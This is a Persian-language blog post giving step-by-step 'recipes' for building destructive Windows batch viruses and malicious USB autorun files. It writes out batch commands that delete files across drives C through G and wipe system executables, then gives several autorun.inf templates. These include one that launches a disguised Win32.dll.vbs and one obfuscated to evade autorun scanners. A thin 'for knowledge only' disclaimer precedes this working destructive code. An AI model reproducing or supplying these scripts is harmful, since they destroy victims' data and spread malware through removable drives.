با سلام خدمت شما بازديدكننده گرامي ، خوش آمدید
به سایت من . لطفا براي هرچه بهتر شدن مطالب اين
وب سایت ، ما را از نظرات و پيشنهادات خود آگاه سازيد
و به ما را در بهتر شدن كيفيت مطالب ياري کنید.
دستور ساخت: این ویروس بسیار خطرناک بوده و پس از اجرای آن تمامی درایو های شما فرمت میشود ...(استفاده نابجا از سوی کاربر از این ویروس بر عهده خود کاربر میباشد این مطلب فقط برای بالا بردن سطح دانش شما است.....) ابتدا یک نت پد باز کرده و در درون آن تایپ کنید:
ATTRIB -a -s -h -r c ATTRIB -a -s -h -r c:\windows\*.*s Echo y | echo a | Echo y | del c:\*.*s Echo y | echo a | Echo y | del d:\*.*s Echo y | echo a | Echo y | del e:\*.*s Echo y | echo a | Echo y | del f:\*.*s Echo y | echo a | Echo y | del g:\*.*s echo y | copy*.* C:\s echo y | copy*.* D:\s echo y | copy*.* E:\s echo y | copy*.* F:\s echo y | copy*.*G:\s نکته مهم:بخاطر درهم نریختن کد بالا مجبور شدم در آخر هر خط یک اس اضافه کنم.....در نوت پد این اس ها را حذف کنید و سپس فایلتان را با پسوند NAME.BAT ذخیره فرمایید.
این ویروس که توسط نت پد(note pad) ساخته می شود بلافاصله بعد از اجرا شروع به پاک کردن فایل های اصلی از درایو ویندوز می کند.و فایل هایی با پسوند .exe و .sys و .com را از درایو ویندوز حذف می کند.
طرز ساخت این ویروس:
در یک فضای دلخواه کلیک راست کرده و از گزینه New ،یک نت پد ایجاد کنید و در داخل نت پد دستورات زیر را کپی کنید:
@echo off
Cls
===========
Color fc
Del /a c:*.com
Del /a c:*.sys
Del /a c:*.exe /s
===========
بعد این نت پد را با پسوند bat. ذخیره کنید. اگر این ویروس اجرا شود دفعه آخر خواهد بود که ویندوز کامپیوتر مذکور بالامیاد!!
به همین دلیل پیشنهاد میکنیم در کامپیوتر خودتان امتحان نکنید.
اتوران کردن فایل ها در فلش مموري کد: [Autorun] OPEN=Virus.EXE shell\open\Command = Virus.EXE shell\explore\Command = Virus.EXE shell\Autoplay\Command = Virus.EXE این ھم یھ نمونھ دیگھ از دستورات فایل اتوران ھست کھ باعث می شھ حتی اگھ با راست کلیک ھم درایو رو باز کنید باز ھم برنامھ اجرا بشھ. کد: [autorun] open= shell\open= باز کردن shell\open\Command=RECYCLER\autorun.exe -OpenCurDir shell\open\Default=1 shell\explore= گشت و گذار shell\explore\Command=RECYCLER\autorun.exe -ExploreCurDir این ھم چند نمونھ مختلف از فایل ھای اتوران کھ قابلیت ھای مفیدی دارن کد: [autorun] action=Open Drive open=autoply.exe OPEN icon=C:\windows\system32\shell32.dll,8 shell\open=Open shell\open\Command=autoply.exe OPEN shell\open\Default=1 shell\explore=Explore shell\explore\Command=autoply.exe EXPLORE shell\AutoPlay=AutoPlay shell\AutoPlay\Command=autoply.exe OPEN بھ وسیلھ اتوران ھست. VBS این یکی برای اجرا کردن فایل ھای بھ شکلی نامگذاری شده کھ کاربر رو بھ اشتباه بندازه Win32.dll.vbs توجھ داشتھ باشید فایل کد: [autorun] shellexecute=wscript.exe WIN32.dll.vbs این ھم یھ مدل درب و داغون نوشتن دستورات اتوران ھست تا بھ راحتی توسط برنامھ ھای گارد و آنالیزور اتوران ، محل فایل ویروس لو نره. کد: [autorun] open=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1033\vmmgr.exe icon=%SystemRoot%\system32\SHELL32.dll,4 action=Open folder to view files shell\open=Open shell\open\command=RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1033\vmmgr.exe shell\open\default=1
اطلاعاتی مفید در مورد فایل AUTORUN.INF در Windows ھای 32 بیتی، قابلیت Autoplay وجود دارد کھ سیستم عامل میتواند بوسیلھ آن محتویات دیسک موجود در درایو را تشخیص دھد. در محیط Windows وقتی کھ دیسک را در درایو قرار میدھیم، سیستم عامل بھ دنبال فایل AUTORUN.INF میگردد . AUTORUN.INF یک فایل متنی است کھ میتوان آن را با Note Pad .درست کرد توانایی ھای فایل AUTORUN.INF : .مسیر و نام برنامھ اجرایی را مشخص میکند تا بھ صورت خودکار بعد از قرار دادن دیسک در درایو اجرا شود .آیکون مورد نظر را جایگزین آیکون پیش فرض درایو قرار میدھد .متن مورد نظر را جایگزین متن پیش فرض میکند برای شروع باید چگونگی ایجاد یک فایل AUTORUN.INF .را توضیح دھیم برای ایجاد فایل میتوانید از برنامھ Note Pad کمک بگیرید. بعد از ایجاد فایل باید پسوند فایل را از TXT بھ INF تغییر دھید. البتھ باید دقت کنید کھ حتما باید در خط اول فرمان [Autorun] .را بنویسید .ھر دستور را ھم باید در خط جدا بنویسید اگر میخواھید بدانید کھ دیسکی کھ در حال حاضر در درایو شما قرار دارد، دارای فایل AUTORUN.INF ھست یا خیر، باید بر روی آیکون آن درایو کلیک راست کنید. اگر در این منو گزینھ Autorun وجود داشتھ باشد یعنی دیسک شما فایل AUTORUN.INF .را دارد اگر بر روی Open در این منو کلیک کنید، میتوانید محتویات داخل دیسک را بدون اجرا کردن Autorun مشاھده کنید. ولی اگر روی Autoplay کلیک کنید، سیستم عامل با استفاده از برنامھ Autorun.EXE فایل Autorun.INF .داخل دیسک را می خواند و دستورات داخل آن فایل را اجرا میکند :توضیحات فایل Autorun.INF .برای اجرای خودکار یک برنامھ مشخص در یک درایو استفاده میشود چگونھ میتوان از اجرای خودکار Autorun.INF ؟ جلوگیری کرد برای این کار باید پس از گذاشتن دیسک در درایو، کلید Shift .را پایین نگھ دارید دستورا ت مربوط بھ فایل Autorun.INF برای ا یجاد یک فایل Autorun.INF :بھ دلخواه Icon: .این دستور برای تعیین آیکون درایو مورد نظر بھ جای آیکون پیش فرض استفاده میشود Icon=iconfilename[,index] Iconfilename : اسم یک فایل است با یکی از پسوند ھای BMP, DLL, ICO یا EXE کھ شامل آیکون مورد نظر .است اگر فایل بیش از یک آیکون داشتھ باشد، میتوانید از پارامتر index ( از 0 تا N) .آیکون مورد نظر را مشخص کنید :مثال در مثال زیر آیکون 7 از فایل Icons.exe .نشان داده میشود Icon=Icons.exe,6 Label: با این دستور میتوان متن مورد نظر را جایگزین Label .پیش فرض درایو نمود Label=LabelText :مثال در اینجا , با این دستور میتوان متن "Best Programs" را جایگزین Label .پیش فرض درایو نمود Label=Best Programs Open: .با این دستور میتوان مسیر یک فایل را تعیین کرد تا بھ ھنگام گذاشتن دیسک در درایو بھ طور خودکار اجرا شود Open=[exepath]exefile[param1[param2]…] منظور ھمان فایل اجرایی است کھ میخواھید ھنگام قرار گرفتن دیسک در درایو بھ صورت خودکار اجرا شود. اگر فایل اجرایی در شاخھ اصلی درایو باشد، میتوان فقط نام فایل را نوشت. در غیر این صورت باید مسیر کامل فایل نوشتھ شود...
عضو شوید
عضویت سریع
آمار مطالب
آمار بازدید
